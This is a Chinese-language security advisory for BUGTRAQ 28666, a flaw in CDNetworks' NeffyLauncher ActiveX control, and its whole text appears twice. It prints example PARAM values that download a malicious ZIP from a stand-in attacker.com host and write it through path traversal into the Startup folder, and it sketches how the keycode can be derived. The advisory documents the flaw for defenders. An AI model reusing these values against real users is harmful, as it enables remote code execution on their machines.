VULHUB ™

BUGTRAQ ID: 28666 CDNetworks是亚洲最大的CDN服务供应商，提供各种在线游戏和视频服务。 CDNetworks所提供的ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞控制用户系统。 Neffycient Download（NeffyLauncher.dll，AA07EBD2-EBDD-4BD6-9F8F-114BD513492C）是CDNetworks所提供的ActiveX控件，用于通过HTTP、FTP等下载和升级游戏安装文件。如果用户对使用该控件站点的版面拥有写权限的话，或获得了有效的keycode的话，就可以修改HttpSkin、SkinPath的值。站点上的恶意文件必须压缩为ZIP文件，例如，以下修改可以将恶意文件拷贝到Windows的根目录： &lt;PARAM NAME=&quot;HttpSkin&quot; VALUE=&quot;http://www.attacker.com/maliciousFiles.zip&quot;&gt; &lt;PARAM NAME=&quot;SkinPath&quot; VALUE=&quot;../../../../&quot;&gt; 这样攻击者就可以将SkinPath的值修改为所有用户的开始程序文件夹，当用户启动计算机时就会执行恶意程序。 攻击者还可以通过调试这个ActiveX控件来生成keycode值。keycode值的前两个数字代表域的长度（16进制），接下来的5个（或更多）数字用于计算域。 CDNetworks NeffyLauncher 1.0.5 CDNetworks ---------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： <a href=http://www.cdnetworks.com/ target=_blank>http://www.cdnetworks.com/</a>

BUGTRAQ ID: 28666 CDNetworks是亚洲最大的CDN服务供应商，提供各种在线游戏和视频服务。 CDNetworks所提供的ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞控制用户系统。 Neffycient Download（NeffyLauncher.dll，AA07EBD2-EBDD-4BD6-9F8F-114BD513492C）是CDNetworks所提供的ActiveX控件，用于通过HTTP、FTP等下载和升级游戏安装文件。如果用户对使用该控件站点的版面拥有写权限的话，或获得了有效的keycode的话，就可以修改HttpSkin、SkinPath的值。站点上的恶意文件必须压缩为ZIP文件，例如，以下修改可以将恶意文件拷贝到Windows的根目录： &lt;PARAM NAME=&quot;HttpSkin&quot; VALUE=&quot;http://www.attacker.com/maliciousFiles.zip&quot;&gt; &lt;PARAM NAME=&quot;SkinPath&quot; VALUE=&quot;../../../../&quot;&gt; 这样攻击者就可以将SkinPath的值修改为所有用户的开始程序文件夹，当用户启动计算机时就会执行恶意程序。 攻击者还可以通过调试这个ActiveX控件来生成keycode值。keycode值的前两个数字代表域的长度（16进制），接下来的5个（或更多）数字用于计算域。 CDNetworks NeffyLauncher 1.0.5 CDNetworks ---------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： <a href=http://www.cdnetworks.com/ target=_blank>http://www.cdnetworks.com/</a>